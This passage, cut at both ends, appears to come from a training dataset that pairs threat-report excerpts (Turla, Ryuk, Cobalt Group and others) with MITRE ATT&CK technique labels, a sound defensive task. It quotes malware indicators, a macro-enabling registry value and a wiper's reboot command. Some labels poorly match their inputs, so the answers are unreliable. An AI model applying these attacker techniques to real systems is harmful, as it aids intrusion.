Python implant that gathers data from Mac OS systems and sends it to a C2 server (Command and Scripting Interpreter: Python [T1059.006]). The Python program downloads various implants based on C2 options specified after the filedown.php (see figure 4", + "output": "- T1059.006: Command and Scripting Interpreter - Python\n- T1071.003: Application Layer Protocol - Mail Protocols" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Daserf \u2014 This backdoor has the functionality of a remote shell and can be used to execute commands, upload and download data, capture screenshots, and log keystrokes. It uses RC4 encryption and custom Base64 encoding to obfuscate HTTP traffic. As of this publication, BRONZE BUTLER demonstrates a preference for concurrently using Datper and xxmm in its operations. MSGet typically downloads encoded binaries from hard-coded URLs. Source: Secureworks) - Screen Capture Tool\u2014 This tool can capture the desktop of a victim's system (see Figure 5). Figure 5. Source: Secureworks) - RarStar \u2014 This custom tool uploads RAR archives to a specified URL as POST data (see Figure 6). RarStar encodes the POST data using Base64 and a custom XOR algorithm. T-SMB Scan \u2014 This SMB scanning tool was originally published on a Chinese program-sharing website (pudn.com). BRONZE BUTLER removed its help message functionality. WinRAR \u2014 This tool extracts tools for lateral movement and compresses data for exfiltration. Use malware to upload the large list of enumerated files to the C2 server. Search proxy log files for evidence of web server scanning using the URL patterns associated with BRONZE BUTLER activity", + "output": "- T1132.001: Data Encoding - Standard Encoding" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "1) Right after midnight, the attackers connected to a machine on the targeted network most probably via RDP. 3) The attacker used psexec.exe to execute \u201cCobalt.Client.exe\u201d, which is the Pay2Key ransomware itself, on different machines within the organization", + "output": "- T1090.001: Proxy - Internal Proxy\n- T1090: Proxy" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Malicious obfuscated VBA code is executed when the macro is first enabled. In some cases, the malicious macro is also executed when the user activates a fake text box", + "output": "- T1204.002: User Execution - Malicious File" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "This group uses spear-phishing emails to deliver both malicious Word and PDF documents, and attempts to social engineer the victim into an infection rather than trying to exploit a software vulnerability", + "output": "- T1566.001: Phishing - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The APT actor has been observed using Cisco AnyConnect Secure Socket Layer (SSL) virtual private network (VPN) connections to enable remote logins on at least one victim network, possibly enabled by an Exim Simple Mail Transfer Protocol (SMTP) vulnerability (CVE 2019-10149) (External Remote Services [T1133]). More recently, the APT actor enumerated and exploited a Fortinet VPN vulnerability (CVE-2018-13379) for Initial Access [TA0001] and a Windows Netlogon vulnerability (CVE-2020-1472) to obtain access to Windows Active Directory (AD) servers for Privilege Escalation [TA0004] within the network (Valid Accounts [T1078]). These vulnerabilities can also be leveraged to compromise other devices on the network (Lateral Movement [TA0008]) and to maintain Persistence [TA0003", + "output": "- T1210: Exploitation of Remote Services\n- T1133: External Remote Services" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "It registers as a system service to ensure its automatic execution at every system startup by adding the following registry keys", + "output": "- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "After an initial dormant period of up to two weeks, it retrieves and executes commands, called \u201cJobs\u201d, that include the ability to transfer files, execute files, profile the system, reboot the machine, and disable system services", + "output": "- T1497.003: Virtualization/Sandbox Evasion - Time Based Evasion" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Once the malware starts it tries to reach a hardcoded C2. The communication takes place using the unmodified HTTP-based protocol, the request and response body are RC4-encrypted, and the encryption key is also hardcoded into the sample", + "output": "- T1573.001: Encrypted Channel - Symmetric Cryptography" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Persistence was established via a crontab entry for a non-root user. With the binary named to masquerade as a legitimate file on the system and placed in a hidden directory, a crontab entry was created with a @reboot line so the GoldMax binary would execute again upon system reboot. Additionally, the threat actor used the nohup command to ignore any hangup signals, and the process will continue to run even if the terminal session was terminated", + "output": "- T1053.003: Scheduled Task/Job - Cron" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "In analyzing FinFisher, the first obfuscation problem that requires a solution is the removal of junk instructions and \u201cspaghetti code\u201d, which is a technique that aims to confuse disassembly programs. Spaghetti code makes the program flow hard to read by adding continuous code jumps, hence the name. An example of FinFisher\u2019s spaghetti code is shown below", + "output": "- T1027: Obfuscated Files or Information\n- T1027.001: Obfuscated Files or Information - Binary Padding" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "While Cobalt Gang 1.0 uses ThreadKit extensively, Cobalt 2.0 adds sophistication to its delivery method, borrowing some of the network infrastructures used by both APT28 (aka Fancy Bear) and MuddyWater. One of the Cobalt 2.0 Group\u2019s latest campaigns, an attack that leads to a Cobalt Strike beacon and to JavaScript backdoor, was investigated and presented by the Talos research team. Cobalt Group Technical Details . Stage 1 - Word Macro + Whitelisting Bypass . As with many other campaigns, the victim received a document with malicious macro visual basic code. In our case the attacker abused cmstp to execute JavaScript scriptlet (XML with JS) that is downloaded from the e-dropbox[.]biz site. Although some security solutions will block all PureBasic programs (wrong move \u2013 there are plenty of legitimate PureBasic programs in use today), it\u2019s a smart move made by the attacker group. The right side of the pair is the name of the JavaScript in the next stage (stage 4) , while the left side of the pair represents the file that will be downloaded as part of stage 5. Such a combination of registry manipulation was reported a year ago as part of an attack campaign executed by the Cobalt Group against Ukrainian banks. As part of the last execution step of the dll, the malicious code writes a JavaScript scriptlet into the Roaming directory and then it executes CreateProcess on the regsvr32 as described by the UserInitMprLogonScript. Stage 5 - JavaScript Backdoor . The last stage JavaScript is downloaded from hxxps://server.vestacp[.]kz/robots.txt. Organizations should expect to see much more coming from all Cobalt Group factions during the next year", + "output": "- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "To confound detection, its operators recently started using PowerShell scripts that provide direct, in-memory loading and execution of malware executables and libraries. We will also present various payloads, including an RPC-based backdoor and a backdoor leveraging OneDrive as its Command and Control (C&C) server. Then, it calls VirtualProtect to allow writing at the retrieved address. Patching of AmsiScanBuffer function . Payloads . The PowerShell scripts we have presented are generic components used to load various payloads, such as an RPC Backdoor and a PowerShell backdoor. RPC backdoor . Turla has developed a whole set of backdoors relying on the RPC protocol. OneDrive credentials in PowerStallion script . It is interesting to note that Turla operators used the free email provider GMX again, as in the Outlook Backdoor and in LightNeuron. Then it uses a net use command to connect to the network drive. It then checks, in a loop, as shown in Figure 12, if a command is available. Modification of MAC times of the local log file . We believe this backdoor is a recovery access tool in case the main Turla backdoors, such as Carbon or Gazer, are cleaned and operators can no longer access the compromised computers. We have seen operators use this backdoor for the following purposes: Conclusion . In a 2018 blogpost, we predicted that Turla would use more and more generic tools", + "output": "- T1106: Native API" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Gain access to the victim\u2019s network by logging into a public-facing system via Secure Shell (SSH) using a local account <user sftp> acquired during previous credential theft activities. Use port forwarding capabilities built into SSH on the public-facing system to establish a Remote Desktop Protocol (RDP) session to an internal server (Server 1) using a domain service account. From Server 1, establish another RDP session to a different internal server (Server 2) using a domain administrator\u2019s account", + "output": "- T1021.001: Remote Services - Remote Desktop Protocol\n- T1090.001: Proxy - Internal Proxy" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "BOOM.exe, tracked by Microsoft as \u201cBoomBox\u201d, can be best described as a malicious downloader. The downloader is responsible for downloading and executing the next-stage components of the infection. These components are downloaded from Dropbox (using a hardcoded Dropbox Bearer/Access token", + "output": "- T1102: Web Service\n- T1105: Ingress Tool Transfer" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "There doesn\u2019t appear to be anything unique when it comes to the Word Document and its standard ploy of pushing recipients to \u201cenable content\u201d and run a malicious macro. An\u00a0analysis of the link from the phishing e-mail contains a base64-encoded string representing the recipient\u2019s address. Using that string, attackers insert the recipient\u2019s name into the filename of the World document", + "output": "- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The C2 domain name for the DNS communication is hardcoded and obfuscated using XOR. The backdoor will generate a subdomain using a custom domain generation algorithm (DGA) and try to send an initial beacon to the C2 via DNS tunneling", + "output": "- T1568.002: Dynamic Resolution - Domain Generation Algorithms" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The older \u201cmode\u201d variant of BitPaymer uses the Windows registry for persistence, while the newer service variant will attempt to install itself as a service", + "output": "- T1543.003: Create or Modify System Process - Windows Service" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "TA453, an\u00a0Iranian-state\u00a0aligned actor,\u00a0masqueraded as British scholars\u00a0to covertly target individuals of intelligence interest to the Iranian government in what Proofpoint has dubbed Operation\u00a0SpoofedScholars. The email conversations were benign until TA453 provided a link to a compromised website hosting a credential harvesting page. The use of a legitimate but actor-compromised website is an increase in sophistication compared to TA453\u2019s historical Tactics, Techniques, and Procedures of using actor-controlled credential phishing websites. Proofpoint has worked with the appropriate authorities to conduct victim notification", + "output": "- T1584.001: Compromise Infrastructure - Domains" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Gather the names of all services running on the system. Gather a list of the names of all processes running on the endpoint. Gather the list of all files names listed in the Recent Items folder i.e. Appdata%\\Microsoft\\Windows\\Recent\"\". - Gather all names of files listed in the Desktop folder of the current user. Gather names of all files and programs listed in the Taskbar i.e. The instrumentor script also enables all macros for Office by setting the VBAWarnings registry value to 0x1 at:\u00a0HKCU\\Software\\Microsoft\\Office\\<OfficeVersionNumber>.0\\Word\\Security\\VBAWarnings = 0x1\"", + "output": "- T1057: Process Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The code injected into an msiexec.exe sends a beacon signal to the CnC server and awaits commands", + "output": "- T1218.007: System Binary Proxy Execution - Msiexec" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Run commands on Windows system remotely using Winexe: Winexe is a GNU/Linux-based application that allows users to execute commands remotely on WindowsNT/2000/XP/2003/Vista/7/8 systems. It installs a service on the remote system, executes the command, and uninstalls the service. Winexe allows execution of most of the windows shell commands", + "output": "- T1569.002: System Services - Service Execution" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "TEARDROP is a memory only dropper that runs as a service, spawns a thread and reads from the file \u201cgracious_truth.jpg\u201d, which likely has a fake JPG header. Next it checks that HKU\\SOFTWARE\\Microsoft\\CTF exists, decodes an embedded payload using a custom rolling XOR algorithm and manually loads into memory an embedded payload using a custom PE-like file format. TEARDROP does not have code overlap with any previously seen malware", + "output": "- T1012: Query Registry" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Stage2.exe is a downloader for a malicious file corrupter malware. Upon execution, stage2.exe downloads the next-stage malware hosted on a Discord channel, with the download link hardcoded in the downloader. The next-stage malware can best be described as a malicious file corrupter. Once executed in memory, the corrupter locates files in certain directories on the system with one of the following hardcoded file extensions", + "output": "- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The Bazar backdoor is a new stealthy malware, part of the TrickBot group\u2019s toolkit arsenal and leveraged for high-value targets. The Bazar loader is used to download and execute the Bazar backdoor on the target system. The goal of this backdoor is to execute binaries, scripts, modules, kill processes, and then remove itself from the compromised machine. The samples used in this campaign heavily rely on\u00a0control flow obfuscation", + "output": "- T1104: Multi-Stage Channels" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Adds persistence on the system by creating a shortcut in the user\u2019s Startup folder with the correct cmdline arguments", + "output": "- T1547.009: Boot or Logon Autostart Execution - Shortcut Modification\n- T1547.001: Boot or Logon Autostart Execution - Registry Run Keys / Startup Folder" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"The malware contains 1 function, the purpose is to open the drive of the infected system (\\\\.\\PhysicalDrive0) and write the following data to the MBR: You can see the \"\"Are you Happy. After writing to the MBR, the malware reboots the machine with the following command: c:\\windows\\system32\\shutdown /r /t 1 After the reboot, the MBR displays the following string to the user: The link to the other campaigns was the following PDB path\"", + "output": "- T1529: System Shutdown/Reboot" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Ryuk attempts to encrypt all mounted drives and hosts that have Address Resolution Protocol (ARP) entries (IP addresses) and it enumerates all mounted drives by calling GetLogicalDrives. For each mounted drive, Ryuk calls GetDriveTypeW to determine the drive\u2019s type. If the drive type is not a CD-ROM, files on the drive are encrypted. To retrieve IP addresses that have ARP entries, Ryuk calls GetIpNetTable. It iterates through all entries and then tries to enumerate files and folders on the remote host and encrypt the files", + "output": "- T1016: System Network Configuration Discovery\n- T1082: System Information Discovery\n- T1083: File and Directory Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "After the Waterbear DLL loader is executed, it searches for a hardcoded path and tries to decrypt the corresponding payload, which is a piece of encrypted shellcode. The decryption algorithm is RC4, which takes the hardcoded path to form the decryption key. If the decrypted payload is valid, it picks a specific existing Windows Service \u2014 LanmanServer, which is run by svchost.exe \u2014 and injects the decrypted shellcode into the legitimate service. In most cases, the payload is a first-stage backdoor, and its main purpose is to retrieve second-stage payloads\u00a0\u2014 either by connecting to a C&C server or opening a port to wait for external connections and load incoming executables", + "output": "- T1140: Deobfuscate/Decode Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "\"Wiping all available methods of recovery shows this attacker had no intention of leaving the machine useable. The purpose of this malware is to perform destruction of the host, leave the computer system offline, and wipe remote data. Additionally, the destroyer disables all the services on the system: The malware uses the ChangeServiceConfigW API to change the start type to 4 which means: \"\"Disabled: Specifies that the service should not be started\"", + "output": "- T1135: Network Share Discovery" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The email attachment is encrypted and stored in the compressed package, and a decryption password is provided in the mail body to bypass the security detection of the email gateway", + "output": "- T1027: Obfuscated Files or Information" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Like any other typical PoS malware, Pillowmint iterates a list of processes and process them two at a time. it uses the API OpenProcess() using the\u00a0PROCESS_VM_READ and PROCESS_QUERY_INFORMATION flags to obtain a handle then reads the memory\u2019s content via ReadProcessMemory() API two chunks at a time. It then captures Track 1 and Track 2 credit card (CC) data. Depending on the Pillowmint version, it may encrypt the stolen CC data with AES encryption algorithm + Base64. Other versions may just encode the plain Credit Card Data it with Base64", + "output": "- T1560: Archive Collected Data\n- T1005: Data from Local System" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Lastly, the attackers used Comodo code-signing certificates several times during the course of the campaign. Many of the above TTPs are not unique to ITG08, but collectively, and with the use of More_eggs, strengthen the link to this group", + "output": "- T1047: Windows Management Instrumentation" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "Other interesting keys include LSMinimumSystemVersion which indicates the (malicious) application is compatible with OSX 10.7 (Lion), and NSUIElement key which tells the OS to execute the application without a dock icon nor menu (i.e", + "output": "- T1564.003: Hide Artifacts - Hidden Window" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "The Gorgon Group Crew Breakdown Finding accessible directories, in combination with their other operational security failures, made it easy to start connecting the dots on Gorgon Group members. 360 and Tuisec already identified some Gorgon Group members. In addition to Subaat, we counted an additional four actors performing attacks as part of Gorgon Group. While it\u2019s not known if the attackers physically reside in Pakistan, all members of Gorgon Group purport to be in Pakistan based on their online personas. fudpages One member of Gorgon Group- we're calling \u2018fudpages\u2019, was found during this campaign activity based on their utilization of shared infrastructure. One specific Microsoft document drew our attention. 446e1c80102c8b9662d66d44525cb9f519369061b02446e0d4cd30cd26d79a25) This Microsoft Word document was sent via email to several industries across the US and Switzerland. We noticed that this document pulls down additional malware from a C2 also being used in attacks by other Gorgon Group members. Additionally, this document communicates to a relatively new piece of C2 infrastructure- umarguzardijye[.]com, which is hosted on 91[.]234[.]99[.]206", + "output": "- T1566.001: Phishing - Spearphishing Attachment" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.", + "input": "After installation, a keylogging routine begins. The malware writes keystrokes and window information to a filename in the present working directory with the following filename", + "output": "- T1074.001: Data Staged - Local Data Staging" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world 